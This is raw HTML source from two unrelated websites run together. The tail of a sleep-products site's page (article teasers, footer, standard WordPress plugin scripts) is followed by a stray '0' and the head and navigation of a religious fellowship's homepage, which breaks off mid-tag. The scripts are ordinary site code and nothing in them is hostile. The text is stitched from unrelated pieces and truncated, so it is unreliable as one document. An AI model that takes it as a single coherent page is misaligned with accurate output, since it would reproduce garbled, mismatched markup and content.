<div class="clearfix"></div> <div class="vc_btn3-container vc_btn3-center vc_custom_1517920971364"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-icon-left vc_btn3-color-warning" href="https://www.sleepadvisor.org/category/bedding-accessories/" title=""><i class="vc_btn3-icon fa fa-plus"></i> More</a></div> </div></div></div><div class="wpb_column vc_column_container vc_col-sm-4"><div class="vc_column-inner vc_custom_1517922237312"><div class="wpb_wrapper"> <article class="wpb_text_column wpb_content_element post vc_custom_1517919580017"> <div class="wpb_wrapper"> <p style="text-align: center;"><span style="text-align: center; color: #ffffff; font-weight: bold; font-size: 30px;">Healthy Sleep</span></p> </div> </article> <div class=" no_bordered_news" data-filterargs='{"post_type":"post","posts_per_page":5,"orderby":"","order":"DESC","cat":"286, 287","no_found_rows":1}' data-template="query_type1" id="rh_filterid_5cdd893c6d34e" data-innerargs='{"type":"2"}'> <div class="news clearfix"> <figure> <a href="https://www.sleepadvisor.org/down-vs-feather-pillow/"><img class="lazyimages" data-src="https://www.sleepadvisor.org/wp-content/uploads/thumbs_dir/down-pillows-versus-feather-ones-6p7f82x44jzkunmabvmofxsuwa8uqpbhej7ou7o1sfu.jpg" width="244" height="184" alt="Down Pillows vs. Feather Pillows &#8211; What's the Difference?" src="https://www.sleepadvisor.org/wp-content/themes/rehub/images/default/noimage_244_200.png" /></a> </figure> <div class="detail"> <h3><a href="https://www.sleepadvisor.org/down-vs-feather-pillow/">Down Pillows vs. Feather Pillows &#8211; What's the Difference?</a></h3> <div class="post-meta"> <span class="admin_meta"> <a class="admin" href="https://www.sleepadvisor.org/mark-reddick/"> Mark Reddick </a> </span> <span class="date_meta">May 15, 2019</span> </div> <p>You may have heard the terms feather and down pillows used interchangeably. Most people think of them as the same thing, but they’re actually very different. The materials come ...</p> <a href="https://www.sleepadvisor.org/down-vs-feather-pillow/" class="btn_more">READ MORE +</a> </div> <div class="post_thumbs_wrap heart_thumb_wrap"><div class="post_thumbs_meter"><span class="table_cell_thumbs"><button class="thumbplus heartplus" title="Vote up" data-post_id="33799" data-informer="0"></button></span><span id="thumbscount33799" class="thumbscount">0</span> </div></div> </div> <div class="news clearfix"> <figure> <a href="https://www.sleepadvisor.org/safe-co-sleeping/"><img class="lazyimages" data-src="https://www.sleepadvisor.org/wp-content/uploads/thumbs_dir/Safe-co-sleeping-image-6n0xfijadvl0batcfg9gfndluemevqknk7nzpr2kvga.jpg" width="244" height="184" alt="Safe Co-Sleeping with Your Baby &#8211; Benefits, Types and Guidelines" src="https://www.sleepadvisor.org/wp-content/themes/rehub/images/default/noimage_244_200.png" /></a> </figure> <div class="detail"> <h3><a href="https://www.sleepadvisor.org/safe-co-sleeping/">Safe Co-Sleeping with Your Baby &#8211; Benefits, Types and Guidelines</a></h3> <div class="post-meta"> <span class="admin_meta"> <a class="admin" href="https://www.sleepadvisor.org/sarah-cummings/"> Sarah Cummings </a> </span> <span class="date_meta">May 7, 2019</span> </div> <p>As you look at ways to help your little one fall asleep quickly and remain safe and secure through the night, you’ve probably come across the idea of co-sleeping. The Internet ...</p> <a href="https://www.sleepadvisor.org/safe-co-sleeping/" class="btn_more">READ MORE +</a> </div> <div class="post_thumbs_wrap heart_thumb_wrap"><div class="post_thumbs_meter"><span class="table_cell_thumbs"><button class="thumbplus heartplus" title="Vote up" data-post_id="23979" data-informer="0"></button></span><span id="thumbscount23979" class="thumbscount">0</span> </div></div> </div> <div class="news clearfix"> <figure> <a href="https://www.sleepadvisor.org/inspiring-bedtime-stories/"><img class="lazyimages" data-src="https://www.sleepadvisor.org/wp-content/uploads/thumbs_dir/out-top-16-bedtime-stories-to-inspire-young-girls-6q1t6wxe5t49im6teqpb0wg7qqxssf9rzgmafwoj8l6.jpg" width="244" height="184" alt="16 Bedtime Stories to Inspire Young Girls" src="https://www.sleepadvisor.org/wp-content/themes/rehub/images/default/noimage_244_200.png" /></a> </figure> <div class="detail"> <h3><a href="https://www.sleepadvisor.org/inspiring-bedtime-stories/">16 Bedtime Stories to Inspire Young Girls</a></h3> <div class="post-meta"> <span class="admin_meta"> <a class="admin" href="https://www.sleepadvisor.org/jill-thompson/"> Jill Thompson </a> </span> <span class="date_meta">May 6, 2019</span> </div> <p>We know that helping your child read at an early age is good for them. While traditional education begins at age 5, 85% of the brain’s important structures are developed by age 3. ...</p> <a href="https://www.sleepadvisor.org/inspiring-bedtime-stories/" class="btn_more">READ MORE +</a> </div> <div class="post_thumbs_wrap heart_thumb_wrap"><div class="post_thumbs_meter"><span class="table_cell_thumbs"><button class="thumbplus heartplus" title="Vote up" data-post_id="36359" data-informer="0"></button></span><span id="thumbscount36359" class="thumbscount">0</span> </div></div> </div> <div class="news clearfix"> <figure> <a href="https://www.sleepadvisor.org/sleep-and-digestion/"><img class="lazyimages" data-src="https://www.sleepadvisor.org/wp-content/uploads/thumbs_dir/digestive-system-and-sleeping-6oa58j524fyh9s8gzeahujxg47042j7qobe129fcuuy.jpg" width="244" height="184" alt="How Digestion Affects Your Sleep Quality" src="https://www.sleepadvisor.org/wp-content/themes/rehub/images/default/noimage_244_200.png" /></a> </figure> <div class="detail"> <h3><a href="https://www.sleepadvisor.org/sleep-and-digestion/">How Digestion Affects Your Sleep Quality</a></h3> <div class="post-meta"> <span class="admin_meta"> <a class="admin" href="https://www.sleepadvisor.org/jill-thompson/"> Jill Thompson </a> </span> <span class="date_meta">April 29, 2019</span> </div> <p>Sleep is vital for health. It’s when your body repairs itself, and your brain consolidates information to learn. When you don’t get enough rest, you’re more likely to suffer from ...</p> <a href="https://www.sleepadvisor.org/sleep-and-digestion/" class="btn_more">READ MORE +</a> </div> <div class="post_thumbs_wrap heart_thumb_wrap"><div class="post_thumbs_meter"><span class="table_cell_thumbs"><button class="thumbplus heartplus" title="Vote up" data-post_id="30101" data-informer="0"></button></span><span id="thumbscount30101" class="thumbscount">0</span> </div></div> </div> <div class="news clearfix"> <figure> <a href="https://www.sleepadvisor.org/how-to-build-a-pillow-fort/"><img class="lazyimages" data-src="https://www.sleepadvisor.org/wp-content/uploads/thumbs_dir/kids-laughing-in-pillow-fort-6q0oup2aaa52kvy8iffzig3b9eelfowc9nbei48erei.jpeg" width="244" height="184" alt="How to Build the Ultimate Pillow Fort + Printable Fort Kit" src="https://www.sleepadvisor.org/wp-content/themes/rehub/images/default/noimage_244_200.png" /></a> </figure> <div class="detail"> <h3><a href="https://www.sleepadvisor.org/how-to-build-a-pillow-fort/">How to Build the Ultimate Pillow Fort + Printable Fort Kit</a></h3> <div class="post-meta"> <span class="admin_meta"> <a class="admin" href="https://www.sleepadvisor.org/sarah-cummings/"> Sarah Cummings </a> </span> <span class="date_meta">April 22, 2019</span> </div> <p>On a rainy day, there’s nothing better than curling up with a book on the couch and relaxing. That is, unless you have a few rambunctious kids who feel cooped up indoors. Standard ...</p> <a href="https://www.sleepadvisor.org/how-to-build-a-pillow-fort/" class="btn_more">READ MORE +</a> </div> <div class="post_thumbs_wrap heart_thumb_wrap"><div class="post_thumbs_meter"><span class="table_cell_thumbs"><button class="thumbplus heartplus" title="Vote up" data-post_id="35678" data-informer="0"></button></span><span id="thumbscount35678" class="thumbscount">0</span> </div></div> </div> </div> <div class="clearfix"></div> <div class="vc_btn3-container vc_btn3-center vc_custom_1517920913691"> <a class="vc_general vc_btn3 vc_btn3-size-md vc_btn3-shape-round vc_btn3-style-modern vc_btn3-icon-left vc_btn3-color-warning" href="https://www.sleepadvisor.org/category/healthy-sleep/" title=""><i class="vc_btn3-icon fa fa-plus"></i> More</a></div> </div></div></div></div></div></div></div></div> </div> </div> </div> <div class="footer-bottom dark_style"> <div class="rh-container clearfix"> <div class="rh-flex-eq-height col_wrap_three"> <div class="footer_widget col_item"> <div id="rehub_social_link-4" class="widget social_link"><div class="title">Follow Us on Social Media</div> <div class="social_icon big_i"> <a href="https://www.facebook.com/The-Sleep-Advisor-403942536624283/" class="fb" rel="nofollow" target="_blank"><i class="fa fa-facebook"></i></a> <a href="https://twitter.com/sleepadvisormag" class="tw" rel="nofollow" target="_blank"><i class="fa fa-twitter"></i></a> <a href="https://plus.google.com/b/102904983195548006529/102904983195548006529" class="gp" rel="nofollow" target="_blank"><i class="fa fa-google-plus"></i></a> <a href="https://www.pinterest.com/thesleepadvisor/" class="pn" rel="nofollow" target="_blank"><i class="fa fa-pinterest"></i></a> </div> </div> </div> <div class="footer_widget col_item"> <div id="nav_menu-2" class="widget widget_nav_menu"><div class="title">Info and Legal</div><div class="menu-top-menu-container"><ul id="menu-top-menu" class="menu"><li id="menu-item-230" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-230"><a rel="nofollow" href="https://www.sleepadvisor.org/about-sleep-advisor/">About Us</a></li> <li id="menu-item-239" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-239"><a rel="nofollow" href="https://www.sleepadvisor.org/contact-us/">Contact Us</a></li> <li id="menu-item-240" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-240"><a rel="nofollow" href="https://www.sleepadvisor.org/terms-conditions/">Terms &#038; Conditions</a></li> <li id="menu-item-241" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-241"><a rel="nofollow" href="https://www.sleepadvisor.org/privacy-policy/">Privacy Policy</a></li> <li id="menu-item-1688" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1688"><a rel="nofollow" href="https://www.sleepadvisor.org/contribute/">Contribute</a></li> </ul></div></div> </div> <div class="footer_widget col_item last"> <div id="text-320" class="widget last widget_text"><div class="title">About Us</div> <div class="textwidget"><p>Sleep Advisor was created out of frustration. We asked our friends about how they find information about sleep information and products. Most of them kept saying they go online and read what shows up on Google. After hearing that, we decided to try it out for ourselves. We conducted search after search and realized there was a common issue: The information wasn’t up to our standards.</p> <p><a href="https://www.sleepadvisor.org/about-sleep-advisor/"><strong>Read More &gt;</strong></a></p> </div> </div> </div> </div> </div> </div> <footer id='theme_footer' class="white_style"> <div class="rh-container clearfix"> <div class="footer_most_bottom"> <div class="f_text"> Copyright © 2019, Sleep Advisor. All rights reserved. <br>Important - By using this website, you are agreeing to our Terms of Use </div> </div> </div> </footer> </div> <span class="rehub_scroll" id="topcontrol" data-scrollto="#top_ankor"><i class="fa fa-chevron-up"></i></span><link href="//netdna.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.css" rel="stylesheet" /> <noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MPNCFP8" height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript> <div class="et_social_pin_images_outer"> <div class="et_social_pinterest_window"> <div class="et_social_modal_header"><h3>Pin It on Pinterest</h3><span class="et_social_close"></span></div> <div class="et_social_pin_images" data-permalink="https://www.sleepadvisor.org/" data-title="New Home" data-post_id="13569"></div> </div> </div> <div id="logo_mobile_wrapper"><a href="https://www.sleepadvisor.org" class="logo_image_mobile"><img src="https://www.sleepadvisor.org/wp-content/uploads/2017/02/the-sleep-advisor-logo.png" alt="The Sleep Advisor" /></a></div> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.sleepadvisor.org\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var sticky_anything_engage = {"element":".image-scroll","topspace":"800","minscreenwidth":"800","maxscreenwidth":"999999","zindex":"99999999","legacymode":"","dynamicmode":"","debugmode":"","pushup":"","adminbar":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/sticky-menu-or-anything-on-scroll/assets/js/stickThis.js?ver=2.1.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var tocplus = {"smooth_scroll":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/table-of-contents-plus/front.min.js?ver=1509'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/ui/widget.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/ui/mouse.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/ui/draggable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/jquery/ui/droppable.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/wp-compear/public/js/wp-compear-public.js?ver=1.1.1'></script> <script type='text/javascript' src='https://www.google.com/recaptcha/api.js?render=6Lc9D2IUAAAAAKBgjYF-xwX62ZNAfVIbZiDqKddJ&#038;ver=3.0'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/monarch/js/idle-timer.min.js?ver=1.4.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var monarchSettings = {"ajaxurl":"https:\/\/www.sleepadvisor.org\/wp-admin\/admin-ajax.php","pageurl":"https:\/\/www.sleepadvisor.org\/","stats_nonce":"97c094968e","share_counts":"4bccade6e5","follow_counts":"a20a3e5cbd","total_counts":"11aed07b3c","media_single":"4c0bae5d6f","media_total":"b25d2f4725","generate_all_window_nonce":"754ce317db","no_img_message":"No images available for sharing on this page"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/monarch/js/custom.js?ver=1.4.5'></script> <script type='text/javascript'> /* <![CDATA[ */ var translation = {"back":"back","ajax_url":"\/wp-admin\/admin-ajax.php","templateurl":"https:\/\/www.sleepadvisor.org\/wp-content\/themes\/rehub","fin":"That's all","your_rating":"Your Rating:","nonce":"70dfc28f75","hotnonce":"d7bcd14aa1","rating_tabs_id":"c0a031f3c1","max_temp":"10","min_temp":"-10"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/themes/rehub/js/custom.js?ver=5.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/comment-reply.min.js?ver=5.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/monarch/core/admin/js/common.js?ver=3.12.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-includes/js/wp-embed.min.js?ver=5.1'></script> <script type='text/javascript' src='https://www.sleepadvisor.org/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ver=5.7'></script> <script type="text/javascript"> ( function( grecaptcha, sitekey ) { var wpcf7recaptcha = { execute: function() { grecaptcha.execute( sitekey, { action: 'homepage' } ).then( function( token ) { var forms = document.getElementsByTagName( 'form' ); for ( var i = 0; i < forms.length; i++ ) { var fields = forms[ i ].getElementsByTagName( 'input' ); for ( var j = 0; j < fields.length; j++ ) { var field = fields[ j ]; if ( 'g-recaptcha-response' === field.getAttribute( 'name' ) ) { field.setAttribute( 'value', token ); break; } } } } ); } }; grecaptcha.ready( wpcf7recaptcha.execute ); document.addEventListener( 'wpcf7submit', wpcf7recaptcha.execute, false ); } )( grecaptcha, '6Lc9D2IUAAAAAKBgjYF-xwX62ZNAfVIbZiDqKddJ' ); </script> <script>(function(w, d){ var b = d.getElementsByTagName("body")[0]; var s = d.createElement("script"); s.async = true; s.src = !("IntersectionObserver" in w) ? "https://www.sleepadvisor.org/wp-content/plugins/wp-rocket/inc/front/js/lazyload-8.15.2.min.js" : "https://www.sleepadvisor.org/wp-content/plugins/wp-rocket/inc/front/js/lazyload-10.17.min.js"; w.lazyLoadOptions = { elements_selector: "img,iframe", data_src: "lazy-src", data_srcset: "lazy-srcset", data_sizes: "lazy-sizes", skip_invisible: false, class_loading: "lazyloading", class_loaded: "lazyloaded", threshold: 300, callback_load: function(element) { if ( element.tagName === "IFRAME" && element.dataset.rocketLazyload == "fitvidscompatible" ) { if (element.classList.contains("lazyloaded") ) { if (typeof window.jQuery != "undefined") { if (jQuery.fn.fitVids) { jQuery(element).parent().fitVids(); } } } } } }; // Your options here. See "recipes" for more information about async. b.appendChild(s); }(window, document)); // Listen to the Initialized event window.addEventListener('LazyLoad::Initialized', function (e) { // Get the instance and puts it in the lazyLoadInstance variable var lazyLoadInstance = e.detail.instance; var observer = new MutationObserver(function(mutations) { mutations.forEach(function(mutation) { lazyLoadInstance.update(); } ); } ); var b = document.getElementsByTagName("body")[0]; var config = { childList: true, subtree: true }; observer.observe(b, config); }, false); </script></body> </html>
0
<!DOCTYPE html> <html lang="en-US"> <head> <meta charset="UTF-8" /> <title>thewaybiblicalfellowship.com | Acts 24:14</title> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <link rel="pingback" href="http://thewaybiblicalfellowship.com/xmlrpc.php" /> <!-- HTML5 shim and Respond.js IE8 support of HTML5 elements and media queries --> <!--[if lt IE 9]> <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script> <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script> <![endif]--> <!-- W3TC-include-js-head --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="thewaybiblicalfellowship.com &raquo; Feed" href="http://thewaybiblicalfellowship.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="thewaybiblicalfellowship.com &raquo; Comments Feed" href="http://thewaybiblicalfellowship.com/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/thewaybiblicalfellowship.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='dashicons-css' href='http://thewaybiblicalfellowship.com/wp-includes/css/dashicons.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='readable-google-fonts-css' href='http://fonts.googleapis.com/css?family=Open+Sans%3A300%2C400%2C700%7CLato%3A700%2C900&#038;ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='main-css' href='http://thewaybiblicalfellowship.com/wp-content/themes/readable/assets/stylesheets/main.css?ver=1.4.3' type='text/css' media='all' /> <style id='main-inline-css' type='text/css'> /****************** Primary theme color *******************/ .social__container, .search__container, .search-panel .search-panel__text, .navigation > li.current-menu-item > a, .navigation > li:hover > a, .navigation > li.current-menu-ancestor > a, .widget-contact__title, .navigation .sub-menu > li > a:hover, .error .primary-color { color: #4e7ec2} .social .social__dropdown, ::selection, .navbar-toggle, .widget_search .search-submit { background: #4e7ec2} .wpcf7-submit, .navigation > li > a:after, .btn-primary, #submitWPComment { background: linear-gradient(to bottom, #4e7ec2, #4671af) } blockquote, .wpcf7-submit, .btn-primary, .navbar-toggle, #submitWPComment { border-color: #4e7ec2} .search__container:hover, .social__container:hover { color: #4671af} @media (min-width: 992px) { .navigation .sub-menu > li > a { background: #4e7ec2 } } .wpcf7-submit:hover, .btn-primary:hover, .social .social__dropdown li a:hover, #submitWPComment:hover { background: #4671af} @media (min-width: 992px) { .navigation .sub-menu > li > a:hover { background: #4671af } } .wpcf7-submit:hover, .navigation .sub-menu > li > a, .navigation .sub-menu, .btn-primary:hover, .social .social__dropdown li .social__container, #submitWPComment:hover { border-color: #4671af} .format-link { background: -webkit-radial-gradient(50% 50%, circle closest-corner, #4e7ec2 0%, #426ba5 100%); background: radial-gradient(circle closest-corner at 50% 50%, #4e7ec2 0%, #426ba5 100%);} /****************** Text color *******************/ blockquote, .post-content, .post-content--narrow, body .su-tabs-style-default .su-tabs-pane { color: #40454a} /****************** Link color *******************/ a, .menu li a, .pptwj .pptwj-tabs-wrap .tab-links li a.selected, .pptwj .pptwj-tabs-wrap .tab-links li a:hover, .pptwj .pptwj-tabs-wrap .boxes ul.tab-filter-list li a:hover, .pptwj .pptwj-tabs-wrap .boxes ul.tab-filter-list li a.selected, .pagination .prev, .pagination .next, .pagination__page-numbers .current { color: #4e7ec2} .widget_tag_cloud a, .tags a { border-color: #4e7ec2} a:hover, .menu li a:hover { color: #4671af} .widget_tag_cloud a:hover, .tags a:hover, .pptwj .pptwj-tabs-wrap .boxes ul.tab-filter-list li a.selected:after, .pptwj .pptwj-tabs-wrap .boxes ul.tab-filter-list li a:hover:after { background-color: #4e7ec2} /****************** Headings dark *******************/ h1, h1 a, .h1 a, .h2, h2, h2 a, .h2 a, h4, h4 a, .h4 a, h5, h5 a, .h5 a, .zem_rp_title { color: #2f343b} /****************** Headings light *******************/ h3, h3 a, .h3 a, h6, h6 a, .h6 a, .wp_rp_excerpt { color: #9a9a90} /****************** Navbar background *******************/ .header { background-color: #ffffff} /****************** Footer background *******************/ .footer, .copyrights { background-color: #ffffff} /****************** Navbar text color *******************/ .navigation > li > a { color: #9a9a90} /****************** Navbar dropdown text color *******************/ @media (min-width: 992px) { .navigation .sub-menu > li > a, .navigation .sub-menu > li > a:hover { color: #f3f4f4 } } /* WP Customizer end */ /* User Custom CSS */ </style> <link rel='stylesheet' id='jetpack-widget-social-icons-styles-css' href='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/modules/widgets/social-icons/social-icons.css?ver=20170506' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='http://thewaybiblicalfellowship.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.5' type='text/css' media='all' /> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='http://thewaybiblicalfellowship.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <link rel='https://api.w.org/' href='http://thewaybiblicalfellowship.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://thewaybiblicalfellowship.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://thewaybiblicalfellowship.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 4.9.10" /> <link rel="canonical" href="http://thewaybiblicalfellowship.com/" /> <link rel='shortlink' href='https://wp.me/P4Ebv5-dm' /> <link rel="alternate" type="application/json+oembed" href="http://thewaybiblicalfellowship.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fthewaybiblicalfellowship.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="http://thewaybiblicalfellowship.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fthewaybiblicalfellowship.com%2F&#038;format=xml" /> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style> <link rel="shortcut icon" href="http://thewaybiblicalfellowship-com.stackstaging.com/wp-content/uploads/2016/11/favicon2.ico"> <style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="website" /> <meta property="og:title" content="thewaybiblicalfellowship.com" /> <meta property="og:description" content="Acts 24:14" /> <meta property="og:url" content="http://thewaybiblicalfellowship.com/" /> <meta property="og:site_name" content="thewaybiblicalfellowship.com" /> <meta property="og:image" content="http://thewaybiblicalfellowship-com.stackstaging.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted-1024x681.jpg" /> <meta property="og:image:width" content="700" /> <meta property="og:image:height" content="466" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="The Way Biblical Fellowship" /> <meta name="twitter:card" content="summary" /> <!-- End Jetpack Open Graph Tags --> <!-- W3TC-include-css --> </head> <body class="home page-template-default page page-id-828"> <!-- W3TC-include-js-body-start --> <!-- Search - Open panel --> <div class="search-panel"> <a href="http://thewaybiblicalfellowship.com/" class="search-panel__close js--toggle-search-mode" title="Exit the search mode"><i class="glyphicon glyphicon-remove"></i></a> <div class="container"> <div class="row"> <div class="col-xs-12"> <form action="http://thewaybiblicalfellowship.com/"> <input type="text" class="search-panel__form js--search-panel-text" name="s" placeholder="Begin typing for search"> <p class="search-panel__text">Press enter to see results or esc to cancel.</p> </form> </div> </div> </div> </div> <div class="page-content-container"><!-- ends in the footer.php --> <!-- header --> <header class="header push-down-45"> <div class="container"> <div class="logo pull-left"> <a href="http://thewaybiblicalfellowship.com"> <img src="http://thewaybiblicalfellowship-com.stackstaging.com/wp-content/uploads/2016/11/new-blue-2.png" alt="thewaybiblicalfellowship.com" /> </a> </div> <!-- Brand and toggle get grouped for better mobile display --> <div class="navbar-header"> <button type="button" class="navbar-toggle" data-toggle="collapse" data-target="#readable-navbar-collapse"> <span class="sr-only">Toggle navigation</span> <span class="icon-bar"></span> <span class="icon-bar"></span> <span class="icon-bar"></span> </button> </div> <nav class="navbar navbar-default" role="navigation"> <!-- Collect the nav links, forms, and other content for toggling --> <div class="collapse navbar-collapse" id="readable-navbar-collapse"> <ul id="menu-main-menu" class="navigation"><li id="menu-item-1266" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1266"><a href="http://thewaybiblicalfellowship.com/teachings/torah-portions-2/torah-portions-by-parsha/">Torah Portions By Parsha</a></li> <li id="menu-item-816" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-816"><a href="http://thewaybiblicalfellowship.com/teachings/">Video Teachings</a></li> <li id="menu-item-819" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-819"><a href="http://thewaybiblicalfellowship.com/articles/">Articles</a></li> <li id="menu-item-820" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-820"><a href="http://thewaybiblicalfellowship.com/recommended-resources/">Resources</a></li> <li id="menu-item-817" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-817"><a href="http://thewaybiblicalfellowship.com/contact-us/">Contact Us</a></li> <li id="menu-item-818" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-818"><a href="http://thewaybiblicalfellowship.com/donate/">Donate</a></li> </ul> <a href="#" class="search__container--mobile js--toggle-search-mode visible-xs visible-sm"> <span class="glyphicon glyphicon-search"></span></a> </div><!-- /.navbar-collapse --> </nav> <div class="hidden-xs hidden-sm"> <a href="#" class="search__container js--toggle-search-mode"> <span class="glyphicon glyphicon-search"></span></a> </div> </div> </header> <div class="container"> <div class="row"> <div class="col-xs-12 col-md-8" role="main"> <!-- Post with featured image --> <article class="boxed push-down-45 post-828 page type-page status-publish hentry"> <!-- Start of the blogpost --> <div class="row"> <div class="col-xs-10 col-xs-offset-1 push-down-30"> <div class="entry-content post-content post-content--narrow"> <h1 class="entry-title post-content__title h2">The Way Biblical Fellowship</h1> <p>&nbsp;</p> <p><img data-attachment-id="1701" data-permalink="http://thewaybiblicalfellowship.com/front-page-2/olivet-hall-repainted/" data-orig-file="https://i2.wp.com/thewaybiblicalfellowship.com/wp-content/uploads/2018/10/Olivet-Hall-Repainted.jpg?fit=4512%2C3000" data-orig-size="4512,3000" data-comments-opened="1" data-image-meta="{&quot;aperture&quot;:&quot;20&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;NIKON 